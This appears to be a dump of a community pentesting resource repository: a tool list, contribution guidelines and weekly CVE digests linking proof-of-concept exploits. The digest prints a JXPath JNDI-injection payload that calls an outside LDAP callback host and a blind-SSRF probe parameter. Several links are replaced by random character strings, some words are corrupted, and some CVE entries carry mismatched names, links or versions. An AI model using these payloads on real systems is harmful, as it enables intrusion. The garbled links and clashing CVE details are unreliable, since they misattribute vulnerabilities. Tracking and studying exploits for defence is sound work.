[Airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) | **Shell** | `Linux/Windows/macOS` | This is a multi-use bash script for Linux systems to audit wireless networks. |\n| [Airbash](https://github.com/tehw0lf/airbash) | **C** | `Linux/Windows/macOS` | A POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetratioAccessing. |\n\n#### :wrench: Exploitation Tools\n\nAcesss systems and data with service-oriented exploits.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [SQLmap](https://github.com/sqlmapproject/sqlmap) | **Python** | `Linux/Windows/macOS` | Automatic SQL injection and database takeover tool. |\n| [XSStrike](https://github.com/UltimateHackers/XSStrike) | **Python** | `Linux/Windows/macOS` | Advanced XSS detection and exploitation suite. |\n| [Commix](https://github.com/commixproject/commix) | **Python** | `Linux/Windows/macOS` | Automated All-in-One OS command injection and exploitation tool. |\n\n#### :busts_in_silhouette: Sniffing & Spoofing\n\nListen to network traffic or fake a network entity.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [Wireshark](https://www.wireshark.org) | **C/C++** | `Linux/Windows/macOS` | Wireshark is a network protocol analyzer. |\n| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |\n| [Zarp](https://github.com/hatRiot/zarp) | **Python** | `Linux/Windows/macOS` | A free network attack framework. |\n\n#### :rocket: Web Hacking\n\nExploit popular CMSs that are hosted online.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [WPScan](https://github.com/wpscanteam/wpscan) | **Ruby** | `Linux/Windows/macOS` | WPScan is a black box WordPress vulnerability scanner. |\n| [Droopescan](https://github.com/droope/droopescan) | **Python** | `Linux/Windows/macOS` | A plugin-based scanner to identify issues with several CMSs, mainly Drupal & Silverstripe. |\n| [Joomscan](https://github.com/rezasp/joomscan) | **Perl** | `Linux/Windows/macOS` | Joomla Vulnerability Scanner. |\n| [Drupwn](https://github.com/immunIT/drupwn) | **Python** | `Linux/Windows/macOS` | Drupal Security Scanner to perform enumerations on Drupal-based web applications. |\n| [CMSeek](https://github.com/Tuhinshubhra/CMSeek) | **Python** | `Linux/Windows/macOS` | CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and 130 other CMSs. |\n\n#### :tada: Post Exploitation\n\nExploits for after you have already gained access.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [TheFatRat](https://github.com/Screetsec/TheFatRat) | **C** | `Linux/Windows/macOS` | Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack, dll. |\n\n### pen-testing Frameworks\n\nFrameworks are packs of pen testing tools with custom shell navigation and documentation.\n\n| Tool | Language | Support | Description |\n| ----------- |-------------------------|----------|----------------|\n| [Operative Framework](https://github.com/graniet/operative-framework) | **Python** | `Linux/Windows/macOS` | Framework based on fingerprint action, this tool is used for get information on a website or a enterprise target with multiple modules. |\n| [Metasploit](https://github.com/rapid7/metasploit-framework) | **Ruby** | `Linux/Windows/macOS` | A penetration testing framework for ethical hackers. |\n| [cSploit](https://github.com/cSploit/android) | **Java** | `Android` | The most complete and advanced IT security professional toolkit on Android. |\n| [radare2](https://github.com/radare/radare2) | **C** | `Linux/Windows/macOS/Android` | Unix-like reverse engineering framework and commandline tools. |\n| [Wifiphisher](https://github.com/wifiphisher/wifiphisher) | **Python** | `Linux` | The Rogue Access Point Framework. |\n| [Beef](https://github.com/beefproject/beef) | **Javascript** | `Linux/Windows/macOS` | The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. |\n| [Mobile Security Framework (MobSF)](https://github.com/MobSF/Mobile-Security-Framework-MobSF) | **Python** | `Linux/Windows/macOS` | Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. |\n| [Burp Suite](https://portswigger.net/burp) | **Java** | `Linux/Windows/macOS` | Burp Suite is a leading range of cybersecurity tools, brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. **This tool is not free and open source** |\n\n([Table of Contents](#table-of-contents))\n\n## Books / Manuals\n\n- [Advance Penetration Testing by Wil Alsoop, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)\n- [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)\n- [The Pentester BluePrint: Starting a Career as an Ethical Hacker](https://www.amazon.in/dp/1119684307/ref=cm_sw_r_cp_apa_i_XMCdGbG3PV2XD) (2014)\n- [Blue Team Field Manual by Alan J White & Ben Clark, 2017](https://www.amazon.de/Blue-Team-Field-Manual-BTFM/dp/154101636X) - [PDF](https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf) (2017)\n- [Cybersecurity - Attack and Defense Strategies](https://www.amazon.com/Cybersecurity-Defense-Strategies-Infrastructure-securit/dp/1788475291) (2018)\n- [Android Hacker's Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) (2009)\n- [Social Engineering : The Art of Human Hacking](https://www.amazon.com/Social-Engineering-Art-Human-Hacking/dp/0470639539) (2010)\n- [The Hackers Playbook 2 by Peter Kim](https://amzn.to/2ObGqkU)\n\n## Discussions (Updating Soon)\n\n- [Reddit/HowToHack](https://www.reddit.com/r/HowToHpen-testing) and ask about hacking, security and pen testing.\n- [Reddit/hacking](https://www.reddit.com/r/hacking) Discuss about hacking and web security.\n- [ax0nes](https://ax0nes.com/) Hacking, security, and software development forum.\n- [0Day.rocks on discord](https://discord.gg/WmYzJfD) Discord server about the 0day.rocks blog for technical and general InfoSec/Cyber discussions & latest news.\n- [Reddit/AskNetsec](https://www.reddit.com/r/AskNetsec/) Discusadvice network security, ask professionals for advices about jobs and stuff.\n\n## Security Advisories\n\n- [CVE: For publicly known cybersecurity vulnerabilities.](http://cve.mitre.org/)\n- [CWE: For software weaknesses and vulnerabilities](http://cwe.mitre.org/)\n- [NVD: Largest publicly available source of vulnerability intelligence.](http://web.nvd.nist.gov/)\n- [OWASP: Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) - Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.\n- [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - Free online security knowledge library for pentesters and researchers.\n- [PTES: Penetration Testing Execution Standard](http://www.pentest-standard.org/) - Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.\n- [Penetration Testing Framework (PTF)](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.\n- [Hackerone reports](https://h1.security.nathan.sx/index.html)\n- [Pentester.land](https://pentester.land/list-of-bug-bounty-writeups.html)\n\n## Must Checkout \n\n- [Awesome Pentesting](https://github.com/enaqx/awesome-pentest/blob/master/README.md)\n- [Devbreak on Twitter](https://twitter.com/DevbreakFR)\n- [The Life of a Security Researcher](https://www.alienvault.com/blogs/security-essentials/the-life-of-a-spotity-researcher)\n- [Find an awesome hacking spot in your country](https://github.com/diasdavid/awesome-hacking-spots)\n- [Awesome-Hacking Lists](https://github.com/Hack-with-Github/Awesome-Hacking/blob/master/README.md)\n- [Crack Station](http://crackstation.net/)\n- [Exploit Database](http://www.exploit-db.com/)\n- [Hackavision](http://www.hackavision.com/)\n- [Hackmethod](https://www.hackmethod.com/)\n- [Packet Storm Security](http://packetstormsecurity.org/)\n- [SecLists](http://seclists.org/)\n- [SecTools](http://sectools.org/)\n- [Smash the Stack](http://smashthestack.org/)\n- [Don't use VPN services](https://gist.github.com/joepie91/5a9909939e6ce7d09e29)\n- [How to Avoid Becoming a Script Kiddie](https://www.wikihow.com/Avoid-Becoming-a-Script-Kiddie)\n- [2017 Top 10 Application Security Risks](https://www.owasp.org/index.php/Top_10-2017_Top_10)\n- [Starting in cybersecurity ?](https://blog.0day.rocks/starting-in-cybersecurity-5b02d827fb54)\n\n\n\n([Table of Contents](#table-of-contents))\n\n# License\n\nThis repository is under MIT license.\n\n([Table of Contents](#table-of-contents))\n" }, { "path": "ResetCybersecuirty/CONTRIBUTING.md", "content": "# Contribution Guidelines\n\nPlease note that this project is released with a **No Code or Low Code contribution**. \n\nContributing to open source isn’t just for technical folks who want to write code. There are lots of opportunities to use your professional skills in support of open-source projects. ResetHacker Community making a point to encourage contributions that require some technical experience or none at all. No matter your experience, you can Join and contribute in ResetHacker!\n\nRESETHACKER welcomes people of any experience level to participate,Join, create and low-code and non-code contributions are fantastic choices for folks who don’t have a lot of technical knowledge. Here are some examples of ways you can contribute to open-source projects:\n\t\n| Writing | Technical documentation | Translating & Copy editing |\n\n\n\n| | Topics | Low code | Non-Code |\n| ----------- |-------------------------|----------|----------------|\n| 1. | **Writing** | `Technical documentation` | Translating & Copy editing. |\n| 2. | **Design** | `Testing` | User experience testing, Graphic design and Video production. |\n| 3. | **Advocacy** | `Talks or presentations, Technical blog posts, Podcast & Case studies` | Social media & Blog posts. |\n\n## Contributors submitting low-code or no-code content by Submitting a pull request\n\n
\n\n- Fork this repository\n- Clone this repository\n- Add or Make the changes\n- Add your name & github link to [Contributors](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Contributors.md)\n- Wait for your pull request to be reviewed and merged! \n\n\n## Updating your Pull Request\n\nSometimes, a maintainer of an ResetHacker community will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the ResetHacker guidelines.\n\n" }, { "path": "ResetCybersecuirty/CVE's/CVE_Assests/Beta.md", "content": "# Security Patched, CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)

\"/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md\"

\n
\n \nA collection on latest proof-of-concept exploit scripts and analysis of latest patched CVE. \n \n > Why you ask becuase There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited and this will makes you and your organization vulnerable with latest vulnerabilities. \n \n \n - Every Week our team filter out latest IT security CVEs POC, update on patchted security, writeups & analysis of cve that has been discovered, written or found by community members. Format we follow : \n \n\n\n \n # Security Patched within a Week: Latest IT security vulnerability patched within this week on selected company such as Apple, Google, :\n # CVE Analysis: CVE analysis and poc for analysis.\n # Poc Exploit : Tracking the recetly discovered PoC of old & new CVE. \n \n - [CVE]\n - Target/Product: ** **\n - Affected Version/ Patched :\n - Discription/Issue/Flaw :\n \n
\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 19th October-25th October 2022.\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Morzilla, Microsoft, Jenkins, Github, Cisco, Linux(Ubuntu 22.4,20.4& 18.4 LTE) etc.\n \n CVE:ANALYSIS & POC: CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969 \n CVE-2022-3236 & CVE-2022-36966. \n\n \n CVE POC (0-Day): 7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits, \n CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422(google crome).\n \n
\n\nSecurity Patched within a Week:\n \n > We track the latest Security Advisories of top vendors and filter out high and critical vulnerability that has been patched within a week.\n\n \n- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in last Week and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***\n \n - **Morzilla security Advisories** : \n - Mozilla has released security updates to address vulnerabilities in *Firefox ESR 102.4* and *Firefox 106*. An attacker could exploit these vulnerabilities to cause denial-of-service conditions.\n \n - **Jenkins security Advisories** : \n - This Week Jenkins announces [vulnerabilities in the multiple Jenkins deliverables](https://www.jenkins.io/security/advisory/2022-10-19/). Our advice will be to follow the advise and update Affected plugins.\n \n - **[Cisco security Advisories](https://tools.cisco.com/security/center/publicationListing.x)** : \n - Cisco has released security update for vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system.\n \n - **Github security Advisories** : \n - [Dataease Mysql Data Source JDBC Connection Parameters Not Verified Leads to Deserialization Vulnerability](https://github.com/dataease/dataease/security/advisories/GHSA-q4qq-jhjv-7rh2)\n - [run-terraform allows for RCE via terraform plan ](https://github.com/kartverket/github-workflows/security/advisories/GHSA-f9qj-7gh3-mhj4)\n - [Team scope authorization bypass when Post/Put request with :team_name in body, allows HTTP parameter pollution](https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf)\n \n - Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages. we highly recomend updating & upgrading these Pakages.\n - **Ubuntu 22.04** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl - Practical Extraction and Report Language,libksba - X.509 and CMS support library,git, frr - FRRouting suite of internet protocols, zlib - Lossless data-compression library,\n\n - **Ubuntu 20.04 LTS** : libreoffice,libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, zlib - Lossless data-compression library.\n\n - **Ubuntu 18.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl, libksba - X.509 and CMS support library, linux-azure-4.15, git.\n\n - **Microsoft** \n - Microsoft have released security advisory to provide information about a vulnerability exists in .NET 6.0, .NET 5.0 and .NET Core 3.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n - https://github.com/dotnet/runtime/security/advisories/GHSA-485p-mrj5-8w2v\n - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-cw98-9j8w-wxv9\n - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-x459-p2rx-f8ff\n - https://github.com/dotnet/runtime/security/advisories/GHSA-vgwq-hfqc-58wv\n - https://github.com/dotnet/runtime/security/advisories/GHSA-c6w8-7mp3-34j9\n \n - **CISA Advisories**\n > CISA has released three (3) Industrial Control Systems (ICS) advisories on October 20, 2022. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.\n \n • ICSA-22-293-01 [Bentley Systems MicroStation Connect](https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01)\n • ICSMA-21-294-01 [B Braun Infusomat Space Large Volume Pump (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-21-294-01)\n • ICSMA-20-296-02 [B. Braun SpaceCom Battery Pack SP with Wi-Fi and Data module compactplus (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-20-296-02)\n\n
\n\n
\n\nCVE Analysis, writeups & reports: (6 CVE analysis in Last 1 Week)\n \n > Every week, we collect the recetly discovered Writeups & reports for CVE. \n\n \n - [Analysis: CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVtechnical-deep-dive-cve-2022-40684/)\n \n - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n - [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)\n - [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&page=1&indices=)\n\n - Vendor : **Fortinet FortiGate**\n - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n - Patched : Apply updates per vendor instructions.\n - Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n \n \n - [Analysis : Exploitation of Zimbra 0Day CVE 2022-41352 ](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/) \n \n - Target/Product: **Zimbra**\n - Discription/Issue/Flaw : The vulnerability affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.\n \n - [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n - [PoC CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)\n - Payload : [jxPathContext.getValue(\"javax.naming.InitialContext.doLookup(\\\"ldap://check.dnslog.cn/obj\\\")\");]\n - Target : **Apache Commons Jxpath**\n - Discription : This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. \n \n - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB) \n - [Analysis:Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)\n - [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)\n - [Tool : CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/text4shell-tools)\n - [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)\n \n - Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .\n - Solution : Upgrade to Apache Commons Text 1.10.0.\n - Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.\n \n - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) \n \n - Target/Product: **Microsoft** \n - Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bound write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n \n - [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)\n \n - Target/Product: **SOPHOS**\n - Discription/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.\n \n \n - [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966).](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)\n \n - Target/Product: **SolarWinds Platform 2022.3.**\n - Affected Cersion : Solarwind <= v2022.3 and Orion Platform <= 2020.2.6 HF5 .\n - Discription/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.\n \n
\n\n
\n PoC for CVE & Exploit (Total : 12 new 0-day in last week) :\n \n > Every week we're tracking the recetly discovered Exploit and PoC for CVE. \n\n \n - [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)\n \n - Target/Product: **Zemana amsdk.sys kernel-mode driver**\n - Affected Version: Watchdog Anti-Malware 4.1.422 , Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.\n - Discription : We discovered an Arbitrary code injection in Zemana amsdk.sys kernel-mode driver, a part of Zemana Antimalware SDK. The vulnerability allows to inject an arbitrary code into the one of the driver code sections and then to execute it with kernel-mode privileges (local privileges escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.\n \n \n - [Poc CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)\n \n - Target/Product: **Gluu**\n - Affected Version: < v4.4.1 \n - Title : Internal network scanner through Gluu IAM blind ssrf. \n - Discription : Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times. To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.\n\n - [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n \n - Target/Product: **Google Chrome**\n - Affected Version: Poc maker calims \"All\" but CVE says version < 80.0.3987.149\n - Solution : google-chrome-upgrade-latest \n - Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n \n - [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)\n \n - Target/Product: **Microsoft Edge**\n - Affected Version: < 97.0.1072.62\n - Discription : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute javascript code on every host without permission, also an attacker can steal local system files, and also he can manipulate the actions against the machine and result in changing internal developer settings in Microsoft Edge.\n \n \n - [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)\n \n - Target/Product: **MS Exchange**\n - Discription : The metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges. \n \n - [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)\n \n - Target/Product: **Spring Cloud Gateway**\n - Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\n - Discription : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n \n - [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)\n \n - Target/Product: **7-Zip**\n - Affected Version: Tested on Version 19.00\n - Discription : 7-ZipPostExploit is a Post-Exploitation script to exfiltrate 7-zip files(Tested on Version 19.00, the attacker has access to plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-zip to an external attacker server. This is done in the post exploitation phase\n \n - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC) \n \n - Target/Product: **Microsoft Exchage Server** \n - Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server. \n - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker) \n\n - [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)\n \n - Target/Product: **Avira**\n - Affected version ; \"Avira Security\" – for Windows version < 1.1.71.30554\n - Discription/Issue/Flaw : PoC for arbitrary file move vulnerability in Software Update component of Avira Security. Users have option to use this feature to update any outdated software on their PC ,when this feature is used Avira Security service will drop downloaded files in c:\\ProgramData\\Avira\\Security\\Temp. First file that is created in subdirectory is in format _ then later this file is moved to just (leading numbers and underscore are removed).This directory have DACL's that dont allow unprivileged users to modify/delete newly created files but it will allow user to create junction. This can abused by creating junction point to user controlled directory which have more permissive DACL's , this way when new files are created in subdirectories user will be able to modify them and leverage it to obtain arbitrary file move which leads to LPE by writing dll in system32 directory that is later loaded by privileged service. Current PoC will load dll in windows update service, dll dont implement any kind of mutex to check if exploit was already executed which result in creating multiple cmd.exe process as dll is loaded multiple times.\n \n \n - [CVE-2022-27502](https://github.com/Mr-xn/cve-2022-23131)\n \n - Target/Product: **Zabbix**\n - Discription : Zabbix Unsafe Session Storage.\n \n - [Sploits](https://github.com/3sjay/sploits)\n \n - Target/Product: **aukey**\n - Discription : aukey-wr-01-RCE-0day.\n \n \n - [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)\n \n - Target/Product: **RealVNC server**\n - Affected Version: aukey wr-r01 ROUTER 0day \n - Discription : RealVNC server up to 6.9.0 DLL Hijacking Exploit.\n\n
\n \n---\nHave a good Weekend#12\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022.\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Apple, Microsoft, Adove, Github, google, Linux(Ubuntu, kali etc), etc.\n \n CVE:ANALYSIS & POC: Poc for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell \n and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): CVE-2021-46422(google crome), CVE-2022-41852, CVE-2021-45067, Poc for CVE-2022-40684 & Nuclei template, \n CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n \n
\n\nSecurity Patched within a Week:\n \n > We track the latest Security advisery of top vendors and filter out high and critical vulnerability that has been patched within a week.\n\n \n- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in last 2 Week(12th Oct - 18th October 2022) and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***\n \n - **Apple security advisery** : \n - A vulnerability(CVE-2022-22658) was found in Apple iOS up to 16.0.2 (Smartphone Operating System}. This issue affects some unknown processing of the component Email Handler. The manipulation with an unknown input leads to a denial of service vulnerability.\n \n - **Google security advisery** : \n - This Week google had released the advisety with [pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice willl be update these products.\n \n - **Adove security advisery** : \n - Adobe has released security update to address multiple vulnerabilities in Adobe software (Cold Fusion, Acrobat and Reader,Adobe Commerce and Magneto Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.\n \n - **Github security advisery** : \n - The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.\n - [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below. \n \n - Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages. we highly recomend updating & upgrading these Pakages.\n - **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solutio etc.\n \n - **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip 